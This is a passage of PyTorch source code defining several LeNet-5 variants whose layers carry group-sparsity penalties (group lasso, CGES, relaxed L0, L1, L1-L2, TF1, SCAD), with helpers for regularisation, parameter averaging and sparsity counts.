        super(group_lasso_LeNet5, self).__init__()
        self.N = N  # training-set size; scales the regularization term below
        assert(len(conv_dims) == 2)
        self.conv_dims = conv_dims
        self.fc_dims = fc_dims
        self.beta_ema = beta_ema
        self.weight_decay = weight_decay

        convs = [group_lasso_Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
                                    weight_decay=self.weight_decay, lamba=lambas[0], local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2),
                 group_lasso_Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
                                    weight_decay=self.weight_decay, lamba=lambas[1], local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2)]
        self.convs = nn.Sequential(*convs)
        if torch.cuda.is_available():
            self.convs = self.convs.cuda()
        # Probe the conv stack to find the flattened feature count for the first FC layer.
        flat_fts = get_flat_fts(input_size, self.convs)
        fcs = [group_lasso_Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
                                 lamba=lambas[2], local_rep=local_rep, temperature=temperature), nn.ReLU(),
               group_lasso_Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
                                 lamba=lambas[3], local_rep=local_rep, temperature=temperature)]
        self.fcs = nn.Sequential(*fcs)

        # Collect the sparsity-inducing layers for regularization()/counting helpers.
        self.layers = []
        for m in self.modules():
            if isinstance(m, group_lasso_Dense) or isinstance(m, group_lasso_Conv2d):
                self.layers.append(m)

        if beta_ema > 0.:
            print('Using temporal averaging with beta: {}'.format(beta_ema))
            self.avg_param = deepcopy(list(p.data for p in self.parameters()))
            if torch.cuda.is_available():
                self.avg_param = [a.cuda() for a in self.avg_param]
            self.steps_ema = 0.

    def forward(self, x):
        o = self.convs(x)
        o = o.view(o.size(0), -1)  # flatten for the fully-connected head
        return self.fcs(o)

    def regularization(self):
        """Summed per-layer regularization, scaled by -1/N (added to the loss)."""
        regularization = 0.
        for layer in self.layers:
            regularization += - (1. / self.N) * layer.regularization()
        if torch.cuda.is_available():
            regularization = regularization.cuda()
        return regularization

    def update_ema(self):
        """Fold current parameters into the exponential moving average."""
        self.steps_ema += 1
        for p, avg_p in zip(self.parameters(), self.avg_param):
            avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)

    def load_ema_params(self):
        """Overwrite live parameters with the bias-corrected EMA parameters."""
        for p, avg_p in zip(self.parameters(), self.avg_param):
            p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))

    def load_params(self, params):
        """Overwrite live parameters with an externally supplied snapshot."""
        for p, avg_p in zip(self.parameters(), params):
            p.data.copy_(avg_p)

    def get_params(self):
        """Return a deep copy of the current parameter tensors."""
        params = deepcopy(list(p.data for p in self.parameters()))
        return params

    def get_w_sparsity(self):
        """Fraction of individual weights that are zero across all tracked layers."""
        sparsity_num = 0.
        sparsity_denom = 0.
        for layer in self.layers:
            sparsity_num += layer.count_zero_w()
            sparsity_denom += layer.count_weight()
        return sparsity_num / sparsity_denom

    def count_active_neuron(self):
        """Total number of active (non-pruned) neurons over all tracked layers."""
        neuron = 0
        for layer in self.layers:
            neuron += layer.count_active_neuron()
        return neuron

    def count_total_neuron(self):
        """Total neuron count over conv/dense layers (pruned or not)."""
        neuron = 0
        for layer in self.layers:
            if isinstance(layer, group_lasso_Conv2d) or isinstance(layer, MAPConv2d) or isinstance(layer, group_lasso_Dense):
                neuron += layer.count_total_neuron()
        return neuron

    def count_reg_neuron_sparsity(self):
        """Neuron-level sparsity (1 - active/total) over the regularized layers."""
        neuron = 0
        total = 0
        for layer in self.layers:
            if isinstance(layer, group_lasso_Conv2d) or isinstance(layer, group_lasso_Dense):
                neuron += layer.count_active_neuron()
                total += layer.count_total_neuron()
        return 1 - neuron / total

    def get_exp_flops_l0(self):
        """Expected FLOPs and expected L0 norm; layers lacking the counter are skipped.

        Note: previously this method was defined twice; Python kept only the last
        definition, so removing the earlier (no-try) copy preserves behavior.
        """
        expected_flops, expected_l0 = 0., 0.
        for layer in self.layers:
            try:
                e_fl, e_l0 = layer.count_expected_flops_and_l0()
                expected_flops += e_fl
                expected_l0 += e_l0
            except Exception:
                # Narrowed from a bare `except:` so KeyboardInterrupt still propagates.
                pass
        return expected_flops, expected_l0
class CGES_LeNet5(nn.Module):
    """LeNet-5 built from CGES-regularized conv and dense layers.

    Same structure/API as ``L0LeNet5`` with an extra ``mu`` hyper-parameter
    forwarded to every ``CGES_*`` layer.
    Fix applied: ``get_exp_flops_l0`` was defined twice; the first definition was
    dead code silently shadowed by the second — only the effective (try/except)
    version is kept, and its bare ``except:`` is narrowed to ``except Exception``.
    """

    def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
                 N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), mu=0.5, local_rep=False,
                 temperature=2./3.):
        super(CGES_LeNet5, self).__init__()
        self.N = N  # training-set size; scales the regularization term below
        assert(len(conv_dims) == 2)
        self.conv_dims = conv_dims
        self.fc_dims = fc_dims
        self.beta_ema = beta_ema
        self.weight_decay = weight_decay
        self.mu = mu  # CGES mixing coefficient, passed to every layer

        convs = [CGES_Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
                             weight_decay=self.weight_decay, lamba=lambas[0], mu=self.mu, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2),
                 CGES_Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
                             weight_decay=self.weight_decay, lamba=lambas[1], mu=self.mu, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2)]
        self.convs = nn.Sequential(*convs)
        if torch.cuda.is_available():
            self.convs = self.convs.cuda()
        # Probe the conv stack to find the flattened feature count for the first FC layer.
        flat_fts = get_flat_fts(input_size, self.convs)
        fcs = [CGES_Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
                          lamba=lambas[2], mu=self.mu, local_rep=local_rep, temperature=temperature), nn.ReLU(),
               CGES_Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
                          lamba=lambas[3], mu=self.mu, local_rep=local_rep, temperature=temperature)]
        self.fcs = nn.Sequential(*fcs)

        # Collect the sparsity-inducing layers for regularization()/counting helpers.
        self.layers = []
        for m in self.modules():
            if isinstance(m, CGES_Dense) or isinstance(m, CGES_Conv2d):
                self.layers.append(m)

        if beta_ema > 0.:
            print('Using temporal averaging with beta: {}'.format(beta_ema))
            self.avg_param = deepcopy(list(p.data for p in self.parameters()))
            if torch.cuda.is_available():
                self.avg_param = [a.cuda() for a in self.avg_param]
            self.steps_ema = 0.

    def forward(self, x):
        o = self.convs(x)
        o = o.view(o.size(0), -1)  # flatten for the fully-connected head
        return self.fcs(o)

    def regularization(self):
        """Summed per-layer regularization, scaled by -1/N (added to the loss)."""
        regularization = 0.
        for layer in self.layers:
            regularization += - (1. / self.N) * layer.regularization()
        if torch.cuda.is_available():
            regularization = regularization.cuda()
        return regularization

    def update_ema(self):
        """Fold current parameters into the exponential moving average."""
        self.steps_ema += 1
        for p, avg_p in zip(self.parameters(), self.avg_param):
            avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)

    def load_ema_params(self):
        """Overwrite live parameters with the bias-corrected EMA parameters."""
        for p, avg_p in zip(self.parameters(), self.avg_param):
            p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))

    def load_params(self, params):
        """Overwrite live parameters with an externally supplied snapshot."""
        for p, avg_p in zip(self.parameters(), params):
            p.data.copy_(avg_p)

    def get_params(self):
        """Return a deep copy of the current parameter tensors."""
        params = deepcopy(list(p.data for p in self.parameters()))
        return params

    def get_w_sparsity(self):
        """Fraction of individual weights that are zero across all tracked layers."""
        sparsity_num = 0.
        sparsity_denom = 0.
        for layer in self.layers:
            sparsity_num += layer.count_zero_w()
            sparsity_denom += layer.count_weight()
        return sparsity_num / sparsity_denom

    def count_active_neuron(self):
        """Total number of active (non-pruned) neurons over all tracked layers."""
        neuron = 0
        for layer in self.layers:
            neuron += layer.count_active_neuron()
        return neuron

    def count_total_neuron(self):
        """Total neuron count over conv/dense layers (pruned or not)."""
        neuron = 0
        for layer in self.layers:
            if isinstance(layer, CGES_Conv2d) or isinstance(layer, MAPConv2d) or isinstance(layer, CGES_Dense):
                neuron += layer.count_total_neuron()
        return neuron

    def count_reg_neuron_sparsity(self):
        """Neuron-level sparsity (1 - active/total) over the regularized layers."""
        neuron = 0
        total = 0
        for layer in self.layers:
            if isinstance(layer, CGES_Conv2d) or isinstance(layer, CGES_Dense):
                neuron += layer.count_active_neuron()
                total += layer.count_total_neuron()
        return 1 - neuron / total

    def get_exp_flops_l0(self):
        """Expected FLOPs and expected L0 norm; layers lacking the counter are skipped.

        Note: previously this method was defined twice; Python kept only the last
        definition, so removing the earlier (no-try) copy preserves behavior.
        """
        expected_flops, expected_l0 = 0., 0.
        for layer in self.layers:
            try:
                e_fl, e_l0 = layer.count_expected_flops_and_l0()
                expected_flops += e_fl
                expected_l0 += e_l0
            except Exception:
                # Narrowed from a bare `except:` so KeyboardInterrupt still propagates.
                pass
        return expected_flops, expected_l0
class group_relaxed_L0LeNet5(nn.Module):
    """LeNet-5 built from group-relaxed-L0-regularized conv and dense layers.

    Same structure/API as ``L0LeNet5`` with an extra ``beta`` hyper-parameter
    forwarded to every ``group_relaxed_L0*`` layer.
    Fix applied: ``get_exp_flops_l0`` was defined twice; the first definition was
    dead code silently shadowed by the second — only the effective (try/except)
    version is kept, and its bare ``except:`` is narrowed to ``except Exception``.
    """

    def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
                 N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), beta=4, local_rep=False,
                 temperature=2./3.):
        super(group_relaxed_L0LeNet5, self).__init__()
        self.N = N  # training-set size; scales the regularization term below
        assert(len(conv_dims) == 2)
        self.conv_dims = conv_dims
        self.fc_dims = fc_dims
        self.beta_ema = beta_ema
        self.weight_decay = weight_decay

        convs = [group_relaxed_L0Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
                                        weight_decay=self.weight_decay, lamba=lambas[0], beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2),
                 group_relaxed_L0Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
                                        weight_decay=self.weight_decay, lamba=lambas[1], beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2)]
        self.convs = nn.Sequential(*convs)
        if torch.cuda.is_available():
            self.convs = self.convs.cuda()
        # Probe the conv stack to find the flattened feature count for the first FC layer.
        flat_fts = get_flat_fts(input_size, self.convs)
        fcs = [group_relaxed_L0Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
                                     lamba=lambas[2], beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
               group_relaxed_L0Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
                                     lamba=lambas[3], beta=beta, local_rep=local_rep, temperature=temperature)]
        self.fcs = nn.Sequential(*fcs)

        # Collect the sparsity-inducing layers for regularization()/counting helpers.
        self.layers = []
        for m in self.modules():
            if isinstance(m, group_relaxed_L0Dense) or isinstance(m, group_relaxed_L0Conv2d):
                self.layers.append(m)

        if beta_ema > 0.:
            print('Using temporal averaging with beta: {}'.format(beta_ema))
            self.avg_param = deepcopy(list(p.data for p in self.parameters()))
            if torch.cuda.is_available():
                self.avg_param = [a.cuda() for a in self.avg_param]
            self.steps_ema = 0.

    def forward(self, x):
        o = self.convs(x)
        o = o.view(o.size(0), -1)  # flatten for the fully-connected head
        return self.fcs(o)

    def regularization(self):
        """Summed per-layer regularization, scaled by -1/N (added to the loss)."""
        regularization = 0.
        for layer in self.layers:
            regularization += - (1. / self.N) * layer.regularization()
        if torch.cuda.is_available():
            regularization = regularization.cuda()
        return regularization

    def update_ema(self):
        """Fold current parameters into the exponential moving average."""
        self.steps_ema += 1
        for p, avg_p in zip(self.parameters(), self.avg_param):
            avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)

    def load_ema_params(self):
        """Overwrite live parameters with the bias-corrected EMA parameters."""
        for p, avg_p in zip(self.parameters(), self.avg_param):
            p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))

    def load_params(self, params):
        """Overwrite live parameters with an externally supplied snapshot."""
        for p, avg_p in zip(self.parameters(), params):
            p.data.copy_(avg_p)

    def get_params(self):
        """Return a deep copy of the current parameter tensors."""
        params = deepcopy(list(p.data for p in self.parameters()))
        return params

    def get_w_sparsity(self):
        """Fraction of individual weights that are zero across all tracked layers."""
        sparsity_num = 0.
        sparsity_denom = 0.
        for layer in self.layers:
            sparsity_num += layer.count_zero_w()
            sparsity_denom += layer.count_weight()
        return sparsity_num / sparsity_denom

    def count_active_neuron(self):
        """Total number of active (non-pruned) neurons over all tracked layers."""
        neuron = 0
        for layer in self.layers:
            neuron += layer.count_active_neuron()
        return neuron

    def count_total_neuron(self):
        """Total neuron count over conv/dense layers (pruned or not)."""
        neuron = 0
        for layer in self.layers:
            if isinstance(layer, group_relaxed_L0Dense) or isinstance(layer, MAPConv2d) or isinstance(layer, group_relaxed_L0Conv2d):
                neuron += layer.count_total_neuron()
        return neuron

    def count_reg_neuron_sparsity(self):
        """Neuron-level sparsity (1 - active/total) over the regularized layers."""
        neuron = 0
        total = 0
        for layer in self.layers:
            if isinstance(layer, group_relaxed_L0Conv2d) or isinstance(layer, group_relaxed_L0Dense):
                neuron += layer.count_active_neuron()
                total += layer.count_total_neuron()
        return 1 - neuron / total

    def get_exp_flops_l0(self):
        """Expected FLOPs and expected L0 norm; layers lacking the counter are skipped.

        Note: previously this method was defined twice; Python kept only the last
        definition, so removing the earlier (no-try) copy preserves behavior.
        """
        expected_flops, expected_l0 = 0., 0.
        for layer in self.layers:
            try:
                e_fl, e_l0 = layer.count_expected_flops_and_l0()
                expected_flops += e_fl
                expected_l0 += e_l0
            except Exception:
                # Narrowed from a bare `except:` so KeyboardInterrupt still propagates.
                pass
        return expected_flops, expected_l0
class group_relaxed_L1LeNet5(nn.Module):
    """LeNet-5 whose conv/dense layers carry a group-relaxed L1 penalty.

    Two conv blocks (conv -> ReLU -> max-pool) followed by two regularized
    dense layers, with optional temporal (EMA) parameter averaging when
    ``beta_ema > 0``.

    Fixes vs. the original: the duplicate ``get_exp_flops_l0`` definition is
    removed (the second shadowed the first), and its bare ``except:`` is
    narrowed to ``except Exception``.
    """

    def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
                 N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), beta=4, local_rep=False,
                 temperature=2. / 3.):
        super(group_relaxed_L1LeNet5, self).__init__()
        self.N = N  # dataset size; scales the regularization term
        assert(len(conv_dims) == 2)
        self.conv_dims = conv_dims
        self.fc_dims = fc_dims
        self.beta_ema = beta_ema
        self.weight_decay = weight_decay
        convs = [group_relaxed_L1Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
                                        weight_decay=self.weight_decay, lamba=lambas[0], beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2),
                 group_relaxed_L1Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
                                        weight_decay=self.weight_decay, lamba=lambas[1], beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2)]
        self.convs = nn.Sequential(*convs)
        if torch.cuda.is_available():
            self.convs = self.convs.cuda()
        # Flattened feature size after the conv stack, probed with a dummy pass.
        flat_fts = get_flat_fts(input_size, self.convs)
        fcs = [group_relaxed_L1Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
                                     lamba=lambas[2], beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
               group_relaxed_L1Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
                                     lamba=lambas[3], beta=beta, local_rep=local_rep, temperature=temperature)]
        self.fcs = nn.Sequential(*fcs)
        # Only the regularized layers take part in penalty/sparsity queries.
        self.layers = []
        for m in self.modules():
            if isinstance(m, group_relaxed_L1Dense) or isinstance(m, group_relaxed_L1Conv2d):
                self.layers.append(m)
        if beta_ema > 0.:
            print('Using temporal averaging with beta: {}'.format(beta_ema))
            self.avg_param = deepcopy(list(p.data for p in self.parameters()))
            if torch.cuda.is_available():
                self.avg_param = [a.cuda() for a in self.avg_param]
            self.steps_ema = 0.

    def forward(self, x):
        o = self.convs(x)
        o = o.view(o.size(0), -1)
        return self.fcs(o)

    def regularization(self):
        """Total penalty over regularized layers, scaled by 1/N (negated per-layer term)."""
        regularization = 0.
        for layer in self.layers:
            regularization += - (1. / self.N) * layer.regularization()
        if torch.cuda.is_available():
            regularization = regularization.cuda()
        return regularization

    def get_exp_flops_l0(self):
        """Expected FLOPs and expected L0, summed over layers that support the count."""
        expected_flops, expected_l0 = 0., 0.
        for layer in self.layers:
            try:
                e_fl, e_l0 = layer.count_expected_flops_and_l0()
                expected_flops += e_fl
                expected_l0 += e_l0
            except Exception:  # best-effort; was a bare except
                pass
        return expected_flops, expected_l0

    def update_ema(self):
        """EMA step: avg <- beta*avg + (1-beta)*param (requires beta_ema > 0)."""
        self.steps_ema += 1
        for p, avg_p in zip(self.parameters(), self.avg_param):
            avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)

    def load_ema_params(self):
        """Copy bias-corrected EMA parameters into the live parameters."""
        for p, avg_p in zip(self.parameters(), self.avg_param):
            p.data.copy_(avg_p / (1 - self.beta_ema ** self.steps_ema))

    def load_params(self, params):
        """Copy the given tensors into the model parameters, position-wise."""
        for p, avg_p in zip(self.parameters(), params):
            p.data.copy_(avg_p)

    def get_params(self):
        """Return a deep-copied snapshot of all parameter tensors."""
        params = deepcopy(list(p.data for p in self.parameters()))
        return params

    def get_w_sparsity(self):
        """Fraction of zero-valued weights across all regularized layers."""
        sparsity_num = 0.
        sparsity_denom = 0.
        for layer in self.layers:
            sparsity_num += layer.count_zero_w()
            sparsity_denom += layer.count_weight()
        return sparsity_num / sparsity_denom

    def count_active_neuron(self):
        """Total active neurons over all regularized layers."""
        neuron = 0
        for layer in self.layers:
            neuron += layer.count_active_neuron()
        return neuron

    def count_total_neuron(self):
        """Total neuron count over layers of the counted types."""
        neuron = 0
        for layer in self.layers:
            if isinstance(layer, (group_relaxed_L1Dense, MAPConv2d, group_relaxed_L1Conv2d)):
                neuron += layer.count_total_neuron()
        return neuron

    def count_reg_neuron_sparsity(self):
        """Fraction of regularized-layer neurons that are inactive."""
        neuron = 0
        total = 0
        for layer in self.layers:
            if isinstance(layer, (group_relaxed_L1Conv2d, group_relaxed_L1Dense)):
                neuron += layer.count_active_neuron()
                total += layer.count_total_neuron()
        return 1 - neuron / total
class group_relaxed_L1L2LeNet5(nn.Module):
    """LeNet-5 whose conv/dense layers carry a group-relaxed L1-L2 penalty.

    Same structure as the sibling LeNet-5 variants in this module.  Fixes vs.
    the original: the duplicate ``get_exp_flops_l0`` definition is removed
    (the second shadowed the first), and its bare ``except:`` is narrowed to
    ``except Exception``.
    """

    def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
                 N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), beta=4, local_rep=False,
                 temperature=2. / 3.):
        super(group_relaxed_L1L2LeNet5, self).__init__()
        self.N = N  # dataset size; scales the regularization term
        assert(len(conv_dims) == 2)
        self.conv_dims = conv_dims
        self.fc_dims = fc_dims
        self.beta_ema = beta_ema
        self.weight_decay = weight_decay
        convs = [group_relaxed_L1L2Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
                                          weight_decay=self.weight_decay, lamba=lambas[0], beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2),
                 group_relaxed_L1L2Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
                                          weight_decay=self.weight_decay, lamba=lambas[1], beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2)]
        self.convs = nn.Sequential(*convs)
        if torch.cuda.is_available():
            self.convs = self.convs.cuda()
        # Flattened feature size after the conv stack, probed with a dummy pass.
        flat_fts = get_flat_fts(input_size, self.convs)
        fcs = [group_relaxed_L1L2Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
                                       lamba=lambas[2], beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
               group_relaxed_L1L2Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
                                       lamba=lambas[3], beta=beta, local_rep=local_rep, temperature=temperature)]
        self.fcs = nn.Sequential(*fcs)
        # Only the regularized layers take part in penalty/sparsity queries.
        self.layers = []
        for m in self.modules():
            if isinstance(m, group_relaxed_L1L2Dense) or isinstance(m, group_relaxed_L1L2Conv2d):
                self.layers.append(m)
        if beta_ema > 0.:
            print('Using temporal averaging with beta: {}'.format(beta_ema))
            self.avg_param = deepcopy(list(p.data for p in self.parameters()))
            if torch.cuda.is_available():
                self.avg_param = [a.cuda() for a in self.avg_param]
            self.steps_ema = 0.

    def forward(self, x):
        o = self.convs(x)
        o = o.view(o.size(0), -1)
        return self.fcs(o)

    def regularization(self):
        """Total penalty over regularized layers, scaled by 1/N (negated per-layer term)."""
        regularization = 0.
        for layer in self.layers:
            regularization += - (1. / self.N) * layer.regularization()
        if torch.cuda.is_available():
            regularization = regularization.cuda()
        return regularization

    def get_exp_flops_l0(self):
        """Expected FLOPs and expected L0, summed over layers that support the count."""
        expected_flops, expected_l0 = 0., 0.
        for layer in self.layers:
            try:
                e_fl, e_l0 = layer.count_expected_flops_and_l0()
                expected_flops += e_fl
                expected_l0 += e_l0
            except Exception:  # best-effort; was a bare except
                pass
        return expected_flops, expected_l0

    def update_ema(self):
        """EMA step: avg <- beta*avg + (1-beta)*param (requires beta_ema > 0)."""
        self.steps_ema += 1
        for p, avg_p in zip(self.parameters(), self.avg_param):
            avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)

    def load_ema_params(self):
        """Copy bias-corrected EMA parameters into the live parameters."""
        for p, avg_p in zip(self.parameters(), self.avg_param):
            p.data.copy_(avg_p / (1 - self.beta_ema ** self.steps_ema))

    def load_params(self, params):
        """Copy the given tensors into the model parameters, position-wise."""
        for p, avg_p in zip(self.parameters(), params):
            p.data.copy_(avg_p)

    def get_params(self):
        """Return a deep-copied snapshot of all parameter tensors."""
        params = deepcopy(list(p.data for p in self.parameters()))
        return params

    def get_w_sparsity(self):
        """Fraction of zero-valued weights across all regularized layers."""
        sparsity_num = 0.
        sparsity_denom = 0.
        for layer in self.layers:
            sparsity_num += layer.count_zero_w()
            sparsity_denom += layer.count_weight()
        return sparsity_num / sparsity_denom

    def count_active_neuron(self):
        """Total active neurons over all regularized layers."""
        neuron = 0
        for layer in self.layers:
            neuron += layer.count_active_neuron()
        return neuron

    def count_total_neuron(self):
        """Total neuron count over layers of the counted types."""
        neuron = 0
        for layer in self.layers:
            if isinstance(layer, (group_relaxed_L1L2Dense, MAPConv2d, group_relaxed_L1L2Conv2d)):
                neuron += layer.count_total_neuron()
        return neuron

    def count_reg_neuron_sparsity(self):
        """Fraction of regularized-layer neurons that are inactive."""
        neuron = 0
        total = 0
        for layer in self.layers:
            if isinstance(layer, (group_relaxed_L1L2Conv2d, group_relaxed_L1L2Dense)):
                neuron += layer.count_active_neuron()
                total += layer.count_total_neuron()
        return 1 - neuron / total
class group_relaxed_TF1LeNet5(nn.Module):
    """LeNet-5 whose conv/dense layers carry a group-relaxed TF1 penalty.

    Same structure as the sibling LeNet-5 variants, plus an ``alpha``
    hyper-parameter forwarded to every regularized layer.  Fixes vs. the
    original: the duplicate ``get_exp_flops_l0`` definition is removed (the
    second shadowed the first), and its bare ``except:`` is narrowed to
    ``except Exception``.
    """

    def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
                 N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), alpha=1., beta=4, local_rep=False,
                 temperature=2. / 3.):
        super(group_relaxed_TF1LeNet5, self).__init__()
        self.N = N  # dataset size; scales the regularization term
        assert(len(conv_dims) == 2)
        self.conv_dims = conv_dims
        self.fc_dims = fc_dims
        self.beta_ema = beta_ema
        self.weight_decay = weight_decay
        convs = [group_relaxed_TF1Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
                                         weight_decay=self.weight_decay, lamba=lambas[0], alpha=alpha, beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2),
                 group_relaxed_TF1Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
                                         weight_decay=self.weight_decay, lamba=lambas[1], alpha=alpha, beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2)]
        self.convs = nn.Sequential(*convs)
        if torch.cuda.is_available():
            self.convs = self.convs.cuda()
        # Flattened feature size after the conv stack, probed with a dummy pass.
        flat_fts = get_flat_fts(input_size, self.convs)
        fcs = [group_relaxed_TF1Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
                                      lamba=lambas[2], alpha=alpha, beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
               group_relaxed_TF1Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
                                      lamba=lambas[3], alpha=alpha, beta=beta, local_rep=local_rep, temperature=temperature)]
        self.fcs = nn.Sequential(*fcs)
        # Only the regularized layers take part in penalty/sparsity queries.
        self.layers = []
        for m in self.modules():
            if isinstance(m, group_relaxed_TF1Dense) or isinstance(m, group_relaxed_TF1Conv2d):
                self.layers.append(m)
        if beta_ema > 0.:
            print('Using temporal averaging with beta: {}'.format(beta_ema))
            self.avg_param = deepcopy(list(p.data for p in self.parameters()))
            if torch.cuda.is_available():
                self.avg_param = [a.cuda() for a in self.avg_param]
            self.steps_ema = 0.

    def forward(self, x):
        o = self.convs(x)
        o = o.view(o.size(0), -1)
        return self.fcs(o)

    def regularization(self):
        """Total penalty over regularized layers, scaled by 1/N (negated per-layer term)."""
        regularization = 0.
        for layer in self.layers:
            regularization += - (1. / self.N) * layer.regularization()
        if torch.cuda.is_available():
            regularization = regularization.cuda()
        return regularization

    def get_exp_flops_l0(self):
        """Expected FLOPs and expected L0, summed over layers that support the count."""
        expected_flops, expected_l0 = 0., 0.
        for layer in self.layers:
            try:
                e_fl, e_l0 = layer.count_expected_flops_and_l0()
                expected_flops += e_fl
                expected_l0 += e_l0
            except Exception:  # best-effort; was a bare except
                pass
        return expected_flops, expected_l0

    def update_ema(self):
        """EMA step: avg <- beta*avg + (1-beta)*param (requires beta_ema > 0)."""
        self.steps_ema += 1
        for p, avg_p in zip(self.parameters(), self.avg_param):
            avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)

    def load_ema_params(self):
        """Copy bias-corrected EMA parameters into the live parameters."""
        for p, avg_p in zip(self.parameters(), self.avg_param):
            p.data.copy_(avg_p / (1 - self.beta_ema ** self.steps_ema))

    def load_params(self, params):
        """Copy the given tensors into the model parameters, position-wise."""
        for p, avg_p in zip(self.parameters(), params):
            p.data.copy_(avg_p)

    def get_params(self):
        """Return a deep-copied snapshot of all parameter tensors."""
        params = deepcopy(list(p.data for p in self.parameters()))
        return params

    def get_w_sparsity(self):
        """Fraction of zero-valued weights across all regularized layers."""
        sparsity_num = 0.
        sparsity_denom = 0.
        for layer in self.layers:
            sparsity_num += layer.count_zero_w()
            sparsity_denom += layer.count_weight()
        return sparsity_num / sparsity_denom

    def count_active_neuron(self):
        """Total active neurons over all regularized layers."""
        neuron = 0
        for layer in self.layers:
            neuron += layer.count_active_neuron()
        return neuron

    def count_total_neuron(self):
        """Total neuron count over layers of the counted types."""
        neuron = 0
        for layer in self.layers:
            if isinstance(layer, (group_relaxed_TF1Dense, MAPConv2d, group_relaxed_TF1Conv2d)):
                neuron += layer.count_total_neuron()
        return neuron

    def count_reg_neuron_sparsity(self):
        """Fraction of regularized-layer neurons that are inactive."""
        neuron = 0
        total = 0
        for layer in self.layers:
            if isinstance(layer, (group_relaxed_TF1Conv2d, group_relaxed_TF1Dense)):
                neuron += layer.count_active_neuron()
                total += layer.count_total_neuron()
        return 1 - neuron / total
class group_relaxed_SCADLeNet5(nn.Module):
    """LeNet-5 whose conv/dense layers carry a group-relaxed SCAD penalty.

    Same structure as the sibling LeNet-5 variants in this module.  Fixes vs.
    the original: the duplicate ``get_exp_flops_l0`` definition is removed
    (the second shadowed the first), and its bare ``except:`` is narrowed to
    ``except Exception``.
    """

    def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
                 N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), beta=4, local_rep=False,
                 temperature=2. / 3.):
        super(group_relaxed_SCADLeNet5, self).__init__()
        self.N = N  # dataset size; scales the regularization term
        assert(len(conv_dims) == 2)
        self.conv_dims = conv_dims
        self.fc_dims = fc_dims
        self.beta_ema = beta_ema
        self.weight_decay = weight_decay
        convs = [group_relaxed_SCAD_Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
                                           weight_decay=self.weight_decay, lamba=lambas[0], beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2),
